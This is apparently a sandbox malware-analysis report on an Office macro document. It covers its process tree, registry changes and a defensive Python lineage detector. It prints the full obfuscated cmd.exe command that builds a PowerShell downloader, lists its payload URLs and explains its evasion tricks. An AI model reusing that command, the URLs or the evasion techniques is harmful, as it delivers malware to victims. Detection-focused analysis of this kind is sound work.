Analysis
- max time kernel: 137s
- max time network: 147s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 17-06-2024 20:33
Behavioral task behavioral1 (this report)
- Sample: b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc
- Resource: win7-20240221-en
Behavioral task behavioral2
- Sample: b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc
- Resource: win10v2004-20240611-en
General
- Target: b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc
- Size: 147KB
- MD5: b9ea54d7115c94d28eb87047cda990e1
- SHA1: 5bc51c3fd4ce45cf1e185c3fac0daffdbdf338c5
- SHA256: 962ff19f56b94669106e2eb69ef717e0a590591608370c41b239a0649d19cfb2
- SHA512: aa6eaf72f92b00475c6dd6bc6a6f00ac6576b9258b69d32e013052f5f21157c698eeec1d8d7173d12cb9ab392b8ba545bebcae9d60df413edadef9334c913b2a
- SSDEEP: 1536:F81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9OUVk0mksZHT:F8GhDS0o9zTGOZD6EbzCda0mkmHT
Malware Config
Extracted URLs (the payload list carried by the PowerShell stage in the process tree below; the stage tries them in order and stops at the first response of at least 80000 bytes):
- http://alistairmccoy.co.uk/0R
- http://erinkveld.eu/tKlZyU
- http://dentaware.com/PbF
- http://havmore.in/UXxra
- http://aphn.org/zTADPIb
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: cmd.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 2548 | 1928 | cmd.exe | WINWORD.EXE
Blocklisted process makes network request (5 IoCs)
Processes: powershell.exe
  flow | pid | process
  5 | 2704 | powershell.exe
  7 | 2704 | powershell.exe
  8 | 2704 | powershell.exe
  9 | 2704 | powershell.exe
  11 | 2704 | powershell.exe
Executes dropped EXE (4 IoCs)
Processes: 38.exe, 38.exe, balloonclear.exe, balloonclear.exe
  pid | process
  1720 | 38.exe
  2580 | 38.exe
  2960 | balloonclear.exe
  2620 | balloonclear.exe
Loads dropped DLL (2 IoCs)
Processes: powershell.exe, 38.exe
  pid | process
  2704 | powershell.exe
  1720 | 38.exe
Drops file in System32 directory (1 IoC)
Processes: balloonclear.exe
  description | ioc | process
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | balloonclear.exe
Drops file in Windows directory (1 IoC)
Processes: WINWORD.EXE
  description | ioc | process
  File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings (31 IoCs)
Processes: WINWORD.EXE (all entries)
  operation | ioc
  Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar
  Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit
  Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel
  Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command
  Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"
  Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"
  Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit
  Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
  Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000
Every entry above points at Office's own binaries (WINWORD.EXE, EXCEL.EXE, ONBttnIE.dll) and is Word registering itself as the default HTML/MHTML editor on a fresh image; the binary "command" values decode as UTF-16LE Windows Installer descriptor strings ending in /n "%1". Treat this block, and the "Modifies registry class" block below, as first-run baseline noise rather than attacker activity. The signature that matters for this sample is the cmd.exe child of WINWORD.EXE.
Modifies data under HKEY_USERS (18 IoCs)
Processes: balloonclear.exe (all entries)
  operation | ioc
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{304FEECD-C082-4DE7-B5BE-0034248DE501}
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-e3-be-98-6b-ea
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{304FEECD-C082-4DE7-B5BE-0034248DE501}\6a-e3-be-98-6b-ea
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-e3-be-98-6b-ea\WpadDecisionReason = "1"
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f011e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-e3-be-98-6b-ea\WpadDecisionTime = e0ee8fb8f5c0da01
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{304FEECD-C082-4DE7-B5BE-0034248DE501}\WpadDecision = "0"
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{304FEECD-C082-4DE7-B5BE-0034248DE501}\WpadDecisionReason = "1"
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{304FEECD-C082-4DE7-B5BE-0034248DE501}\WpadDecisionTime = e0ee8fb8f5c0da01
  Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-e3-be-98-6b-ea\WpadDecision = "0"
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings
  Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{304FEECD-C082-4DE7-B5BE-0034248DE501}\WpadNetworkName = "Network 3"
These are WinINet's proxy auto-detection (WPAD) settings being written to the .DEFAULT hive rather than to the Admin user's hive, which means balloonclear.exe is doing its network setup in the SYSTEM account context, not as the logged-on user who opened the document.
Modifies registry class (64 IoCs)
Processes: WINWORD.EXE (all entries)
  operation | ioc
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes: WINWORD.EXE
  pid | process
  1928 | WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes: powershell.exe, 38.exe, 38.exe, balloonclear.exe, balloonclear.exe
  pid | process
  2704 | powershell.exe
  1720 | 38.exe
  2580 | 38.exe
  2960 | balloonclear.exe
  2620 | balloonclear.exe (logged 4 times)

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes: powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 2704 | powershell.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
Processes: WINWORD.EXE
  pid | process
  1928 | WINWORD.EXE (logged 2 times)

Suspicious use of WriteProcessMemory (28 IoCs)
Processes: WINWORD.EXE, cmd.exe, cmd.exe, powershell.exe, 38.exe, balloonclear.exe
Each parent-to-child write below was logged 4 times; collapsed here to one row per pair.
  pid | process | target pid | target process
  1928 | WINWORD.EXE | 3040 | splwow64.exe
  1928 | WINWORD.EXE | 2548 | cmd.exe
  2548 | cmd.exe | 2516 | cmd.exe
  2516 | cmd.exe | 2704 | powershell.exe
  2704 | powershell.exe | 1720 | 38.exe
  1720 | 38.exe | 2580 | 38.exe
  2960 | balloonclear.exe | 2620 | balloonclear.exe
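The "Process spawned unexpected child process" and "Executes dropped EXE" signatures above are both lineage checks: they fire because a shell, and then an executable in %TEMP%, have WINWORD.EXE somewhere above them. The Python below is an added example, not part of the sandbox report, showing the same check over process-creation records. The (pid, ppid, image) tuples are constructed from the PIDs and paths in this report's process tree; the parent PIDs of the two tree roots (1000 for WINWORD.EXE, 500 for the balloonclear.exe service instance) are assumed, because the report does not record them.

```python
"""Office-to-shell lineage check over process-creation records.

Added example, not part of the sandbox report. It reproduces the logic
behind "Process spawned unexpected child process" and "Executes dropped EXE"
in a form you can run over your own telemetry: build a pid->parent map,
walk each process's ancestry, and flag shells/script hosts and executables
launched from %TEMP% that have an Office application above them.
"""
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "mspub.exe"}
SHELL_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
               "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
TEMP_MARKER = "\\appdata\\local\\temp\\"

# (pid, ppid, image path) constructed from the PIDs and paths in the report's
# process tree. The root parents (1000 for WINWORD.EXE, 500 for the
# balloonclear.exe service instance) are assumed; the report does not give them.
EVENTS = [
    (1928, 1000, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"),
    (3040, 1928, r"C:\Windows\splwow64.exe"),
    (2548, 1928, r"\??\c:\windows\SysWOW64\cmd.exe"),
    (2516, 2548, r"C:\Windows\SysWOW64\cmd.exe"),
    (2704, 2516, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"),
    (1720, 2704, r"C:\Users\Admin\AppData\Local\Temp\38.exe"),
    (2580, 1720, r"C:\Users\Admin\AppData\Local\Temp\38.exe"),
    (2960, 500, r"C:\Windows\SysWOW64\balloonclear.exe"),
    (2620, 2960, r"C:\Windows\SysWOW64\balloonclear.exe"),
]


def image_name(path):
    """Lower-cased basename; strips the \\??\\ NT-namespace prefix seen on PID 2548."""
    return ntpath.basename(path.replace("\\??\\", "")).lower()


def ancestry(by_pid, pid):
    """[(pid, image), ...] from the oldest known ancestor down to pid.
    Stops at an unknown parent or on a cycle (pid reuse can create one)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ppid, path = by_pid[pid]
        chain.append((pid, image_name(path)))
        pid = ppid
    return chain[::-1]


def office_descendant_alerts(events):
    """Return {pid: ancestry} for every shell/script host or %TEMP% executable
    that has an Office application somewhere above it."""
    by_pid = {pid: (ppid, path) for pid, ppid, path in events}
    alerts = {}
    for pid, _ppid, path in events:
        name = image_name(path)
        suspicious = name in SHELL_HOSTS or TEMP_MARKER in path.lower()
        if not suspicious:
            continue
        chain = ancestry(by_pid, pid)
        # chain[:-1] excludes the process itself: only ancestors count
        if any(img in OFFICE_APPS for _p, img in chain[:-1]):
            alerts[pid] = chain
    return alerts


if __name__ == "__main__":
    for pid, chain in sorted(office_descendant_alerts(EVENTS).items()):
        print(pid, " -> ".join(f"{p}:{img}" for p, img in chain))
```

Run against the report's tree this flags 2548, 2516, 2704, 1720 and 2580 and leaves splwow64.exe alone. It also shows the limit of lineage alone: neither balloonclear.exe instance is flagged, because the report shows it starting as its own tree root rather than as a child of 38.exe. Tying that stage back to the document needs the file-write or service-install event, not the process tree.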
Processes

(level 1) C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc"
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 1928

  (level 2) C:\Windows\splwow64.exe
    Command line: C:\Windows\splwow64.exe 12288
    PID: 3040
    splwow64.exe is the 32-bit print-spooler proxy that 32-bit Office launches routinely; no signature fired on it, and it is not part of the infection chain.
  (level 2) \??\c:\windows\SysWOW64\cmd.exe
    Command line: c:\bTorQSzoJk\vIzwwzd\TBWRXjkRVBf\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set LEA=uUTnlInWPSJGzFDwviio(Cxc)e8dp$mj0yVfOX;@Bb,+Eg:NHZhR}r{/\A3skL=.'ta- K&&for %W in (29;53;47;51;62;64;15;40;65;64;38;29;4;31;65;62;6;25;15;67;19;41;31;25;23;65;68;47;25;65;63;7;25;41;21;4;18;25;6;65;38;29;61;12;31;62;64;50;65;65;28;46;55;55;66;4;18;59;65;66;18;53;30;23;23;19;33;63;23;19;63;0;60;55;32;51;39;50;65;65;28;46;55;55;25;53;18;6;60;16;25;4;27;63;25;0;55;65;69;4;49;33;1;39;50;65;65;28;46;55;55;27;25;6;65;66;15;66;53;25;63;23;19;30;55;8;41;13;39;50;65;65;28;46;55;55;50;66;16;30;19;53;25;63;18;6;55;1;37;22;53;66;39;50;65;65;28;46;55;55;66;28;50;6;63;19;53;45;55;12;2;57;14;8;5;41;64;63;9;28;4;18;65;20;64;39;64;24;38;29;59;66;69;62;64;51;6;69;64;38;29;14;66;15;68;62;68;64;58;26;64;38;29;44;27;37;62;64;44;2;61;64;38;29;47;8;0;62;29;25;6;16;46;65;25;30;28;43;64;56;64;43;29;14;66;15;43;64;63;25;22;25;64;38;35;19;53;25;66;23;50;20;29;4;31;8;68;18;6;68;29;61;12;31;24;54;65;53;33;54;29;4;31;65;63;14;19;15;6;4;19;66;27;13;18;4;25;20;29;4;31;8;42;68;29;47;8;0;24;38;29;12;59;36;62;64;48;13;57;64;38;5;35;68;20;20;11;25;65;67;5;65;25;30;68;29;47;8;0;24;63;4;25;6;45;65;50;68;67;45;25;68;26;32;32;32;32;24;68;54;5;6;16;19;60;25;67;5;65;25;30;68;29;47;8;0;38;29;2;34;37;62;64;31;10;10;64;38;41;53;25;66;60;38;52;52;23;66;65;23;50;54;52;52;29;11;9;61;62;64;12;31;66;64;38;72)do set Zb9=!Zb9!!LEA:~%W,1!&&if %W geq 72 powershell.exe "!Zb9:*Zb9!=!""
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    PID: 2548
    Three evasions are visible in this one line. The image is reached through a throwaway directory and ..\..\.., which normalizes to c:\windows\system32\cmd.exe but defeats naive string matching on the literal command line. %ProgramData:~0,1%%ProgramData:~9,2% takes the first character and characters 9-10 of C:\ProgramData, spelling CmD for the child process (visible as the first token of the level-3 command line) without the string "cmd" appearing. The set LEA=... table and the for %W in (...) loop then assemble the PowerShell stage one character at a time by indexing into LEA with delayed expansion (/V:O), so the real script never appears on this command line; the final !Zb9:*Zb9!=! strips anything preceding the literal Zb9! in the accumulator before handing the result to powershell.exe.
    (level 3) C:\Windows\SysWOW64\cmd.exe
